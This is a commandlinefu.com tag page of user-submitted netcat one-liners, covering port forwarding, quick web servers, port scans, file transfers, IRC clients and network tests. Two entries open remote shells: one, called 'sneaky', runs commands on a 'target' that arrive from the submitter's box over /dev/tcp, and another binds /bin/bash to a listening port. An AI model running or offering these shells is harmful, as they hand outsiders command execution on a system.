Commands tagged netcat (31)

  • Redirect the local port 2000 to the remote port 3000. The same but UDP: nc -u -l -p 2000 -c "nc -u example.org 3000" It may be used to "convert" TCP client to UDP server (or viceversa): nc -l -p 2000 -c "nc -u example.org 3000"


    25
    nc -l -p 2000 -c "nc example.org 3000"
    prayer · 2009-03-01 21:28:39 2
  • Very simple web server listening on port 80 will serve index.html file or whatever file you like pointing your browser at http://your-IP-address/index.html for example. If your web server is down for maintenance and you'd like to inform your visitors about it, quickly and easily, you just have to put into the index.html file the right HTML code and you are done! Of course you need to be root to run the command using port 80.


    12
    while true ; do nc -l 80 < index.html ; done
    ztank1013 · 2011-08-31 15:17:33 6
  • Command makes use of the Malware Hash Registry (http://www.team-cymru.org/Services/MHR/). It parses the current directory and subdirectories and calculates the md5 hash of the files, then prints the name and sends the hash to the MHR for a lookup in their database. The 3rd value in the result is the detection percentage across a mix of AV packages. Show Sample Output


    11
    IFS=$'\n' && for f in `find . -type f -exec md5sum "{}" \;`; do echo $f | sed -r 's/^[^ ]+/Checking:/'; echo $f | cut -f1 -d' ' | netcat hash.cymru.com 43 ; done
    Neo23x0 · 2011-10-15 03:38:47 0
  • Simple one-liner for scanning a range of hosts, you can also scan a range of ports with Netcat by ex.: nc -v -n -z -w 1 192.168.0.1 21-443 Useful when Nmap is not available:) Range declaration like X..X "for i in {21..29}" is only works with bash 3.0+ Show Sample Output


    9
    for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done
    rez0r · 2009-09-25 03:31:29 3
  • This is sneaky. First, start a listening service on your box. nc -l 8080 -vvv & On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor. exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done You can send it to the background like this: (exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) & Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client. Show Sample Output


    9
    exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
    somaddict · 2012-11-16 02:48:01 2
  • Uses the extremely cool utilities netcat and expect. "expect" logs in & monitors for server PING checks. When a PING is received it sends the PONG needed to stay connected. IRC commands to try: HELP, TIME, MOTD, JOIN and PRIVMSG The "/" in front of IRC commands are not needed, e.g. type JOIN #mygroup Learn about expect: http://tldp.org/LDP/LGNET/issue48/fisher.html The sample output shows snippets from an actual IRC session. Please click UP button if you like it! Show Sample Output


    9
    nik=clf$RANDOM;sr=irc.efnet.org;expect -c "set timeout -1;spawn nc $sr 6666;set send_human {.1 .2 1 .2 1};expect AUTH*\n ;send -h \"user $nik * * :$nik commandlinefu\nnick $nik\n\"; interact -o -re (PING.:)(.*\$) {send \"PONG :\$interact_out(2,string)\"}"
    omap7777 · 2015-03-18 09:10:28 7

  • 8
    nc -l -p 2000 < song.mp3
    prayer · 2009-03-02 15:54:21 1
  • To connect to the shell run: nc server.example.org 2000


    6
    nc -l -p 2000 -e /bin/bash
    prayer · 2009-03-02 15:58:25 3
  • @putnamhill, no need if statement in that case. && is a AND and || is a OR


    6
    nc -zw2 www.example.com 80 && echo open
    sputnick · 2009-12-07 21:35:25 3
  • Try to perform a fully TCP 3 way handshake on for a given host-port with a timeout of 1s. Show Sample Output


    6
    nc -zvw 1 host port
    akhilravidas · 2012-07-13 20:02:17 0

  • 5
    lsof -i :22
    bucciarati · 2011-03-11 16:48:37 0
  • for udp nmap -sU -p 80 hostname


    4
    nmap -p 80 hostname
    solarislackware · 2009-12-08 20:25:28 0
  • Requires netcat.


    2
    if (nc -zw2 www.example.com 80); then echo open; fi
    putnamhill · 2009-12-07 20:04:55 0

  • 2
    grep current_state= /var/log/nagios/status.dat|sort|uniq -c|sed -e "s/[\t ]*\([0-9]*\).*current_state=\([0-9]*\)/\2:\1/"|tr "\n" " "
    c3w · 2010-03-11 06:04:14 0
  • command | my_irc Pipe whatever you want to this function, it will, if everything goes well, be redirected to a channel or a user on an IRC server. Please note that : - I am not responsible of flood excesses you might provoke. - that function does not reply to PINGs from the server. That's the reason why I first write in a temporary file. Indeed, I don't want to wait for inputs while being connected to the server. However, according to the configuration of the server and the length of your file, you may timeout before finishing. - Concerning the server, the variable content must be on the form "irc.server.org 6667" (or any other port). If you want to make some tests, you can also create a fake IRC server on "localhost 55555" by using netcat -l -p 55555 - Concerning the target, you can choose a channel (beginning with a '#' like "#chan") or a user (like "user") - The other variables have obvious names. Show Sample Output


    1
    function my_irc { tmp=`mktemp`; cat > $tmp; { echo -e "USER $username x x :$ircname\nNICK $nick\nJOIN $target"; while read line; do echo -e "PRIVMSG $target :$line"; done < $tmp; } | nc $server > /dev/null ; rm $tmp; }
    Josay · 2009-06-11 22:14:48 0
  • sends commands specified in $commandfile to the telnet-server specified by $telnetserver. to have newlines in $commandfile interpreted as ENTER, save the file in CR+LF (aka "Windows-Textfile") format. if you want to save the output in a separate file, use: nc $telnetserver 23 < $commandfile > $resultfile


    1
    nc $telnetserver 23 < $commandfile
    flokra · 2009-08-07 21:32:38 0
  • USAGE: gate listening_port host port Creates listening socket and connects to remote device at host:port. It uses pipes for connection between two sockets. Traffic which goes through pipes is wrote to stdout. I use it for debug network scripts.


    1
    gate() { mkfifo /tmp/sock1 /tmp/sock2 &> /dev/null && nc -p $1 -l < /tmp/sock1 | tee /tmp/sock2 & PID=$! && nc $2 $3 < /tmp/sock2 | tee /tmp/sock1; kill -KILL $PID; rm -f /tmp/sock1 /tmp/sock2 ; }
    true · 2009-09-25 08:10:23 1
  • On the another machine write this command. pv -r /dev/zero | nc 192.168.1.1 7777 It will show live throughput between two machine.The destination machine ip is at our example 192.168.1.1 You must multiply by 8 for the network calculation. You must install pv and netcat commands for this commands usage. kerim@bayner.com http://www.bayner.com/ Show Sample Output


    1
    nc -l -p 7777 > /dev/null
    kerim · 2011-01-24 00:06:45 2
  • wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C root@savelocation.com "cat - > /forensics/T430-8gb-RAM1.dd" Run above command from Windows Cygwin: On Windows: Install Cygwin, and copy WMR (windows memory reader 1.0) memory diagnostic into cygwin\bin folder, also install cygwins netcat and ssh (openssh). I recommend installing apt-cyg and running " On Linux: Have an SSH Server SIMPLEST FORM: WINDOWS: # wmr - | ssh root@savelocation.com "cat - > /tmp/FileToSave.dd" For more details on how to extract information from memory dump: apt-get install foremost foremost -t all -T -i /forensics/T430-8gb-RAM1.dd For more information: http://www.kossboss.com/memdump-foremost Show Sample Output


    1
    wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C root@savelocation.com "cat - > /forensics/T430-8gb-RAM1.dd"
    bhbmaster · 2013-05-31 00:04:19 8
  • Use it to send raw data to a networked device. Used to interact with relay controller board whose documentation is lost, so use wireshark to sniff the sent data and replayed using the command.


    1
    echo -n 023135 | perl -pe 's/([0-9a-f]{2})/chr hex $1/gie' | nc -4u -q1 -p5001 192.168.0.100 2000
    sucotronic · 2013-09-18 14:31:47 0
  • `while true`: do forever `nc -l -p 4300 -c 'echo hello'`: this is the but anything can go here really `test $? -gt 0 && break`: this checks the return code for ctrl^c or the like and quite the loop, otherwise in order to kill the loop you'd have to get the parent process id and kill it. Show Sample Output


    1
    while true ; do nc -l -p 4300 -c 'echo hello'; test $? -gt 0 && break; done
    rawco · 2016-03-22 21:55:44 0
  • Tar's up $DIR locally (w/bzip2) and sends remotely to $HOST:$PORT where netcat listens (using openbsd netcat). Start up receiving side command first, then execute this.


    0
    tar -cjf - $DIR | nc $HOST $PORT
    taintedkernel · 2012-11-13 16:44:26 0
  • Receives bzip'd tar archive via netcat (openbsd nc) and stores locally. Displays size with pv. Start this receiver first, then the sender.


    0
    nc -l $PORT | pv -b > archive.tar.bz2
    taintedkernel · 2012-11-13 16:47:45 0
  • A TCP server that keeps the same socket open, sending the contents of "file" repeatedly.


    0
    while true; do cat "file"; done | nc -v -l 1337
    bknk · 2014-02-06 03:02:58 0
  • If you want to see your top ten cpu using processes from the browser (e.g. you don't want to ssh into your server all the time for checking system load) you can run this command and browse to the machines ip on port 8888. For example 192.168.0.100:8888 Show Sample Output


    0
    while true; do ps aux | sort -rk 3,3 | head -n 11 | cut -c -120 | netcat -l -p 8888 2>&1 >/dev/null; done &
    manumiu · 2014-08-29 07:10:57 0
  •  1 2 > 

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands


Check These Out

Check if a web page has changed last time checked.
Checks if a web page has changed. Put it into cron to check periodically. Change http://www.page.de/test.html and mail@mail.de for your needs.

cd to (or operate on) a file across parallel directories
This is useful for quickly jumping around branches in a file system, or operating on a parellel file. This is tested in bash. cd to (substitute in PWD, a for b) where PWD is the bash environmental variable for the "working directory"

exec chmod to subfiles
Using `-exec cmd {} +` causes find to build the command using all matching filenames before execution, rather than once per file.

Keep a copy of the raw Youtube FLV,MP4,etc stored in /tmp/
Certain Flash video players (e.g. Youtube) write their video streams to disk in /tmp/ , but the files are unlinked. i.e. the player creates the file and then immediately deletes the filename (unlinking files in this way makes it hard to find them, and/or ensures their cleanup if the browser or plugin should crash etc.) But as long as the flash plugin's process runs, a file descriptor remains in its /proc/ hierarchy, from which we (and the player) still have access to the file. The method above worked nicely for me when I had 50 tabs open with Youtube videos and didn't want to have to re-download them all with some tool.

Find broken symlinks in the current directory and its subdirectories.
This is best run as root to avoid permission denials that can produce false positives. Obviously you can specify a directory in the usual way: $ find -L dirname -type l I can't remember where I read about this or who deserves the credit for it. The find(1) manual page hints strongly toward it, however.

Outputs a 10-digit random number

archlinux: shows list of packages that are no longer needed
Shows a list of packages which are no longer needed as dependencies of any package installed on your system.

Display the size of all your home's directories
Display the size (human reading) of all the directories in your home path (~).

geoip information
Not my script. Belongs to mathewbauer. Used without his permission. This script gives a single line as shown in the sample output. NOTE: I have blanked out the IP address for obvious security reasons. But you will get whatever is your IP if you run the script. Tested working in bash.

Detect illegal access to kernel space, potentially useful for Meltdown detection
Based on capsule8 agent examples, not rigorously tested


Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for: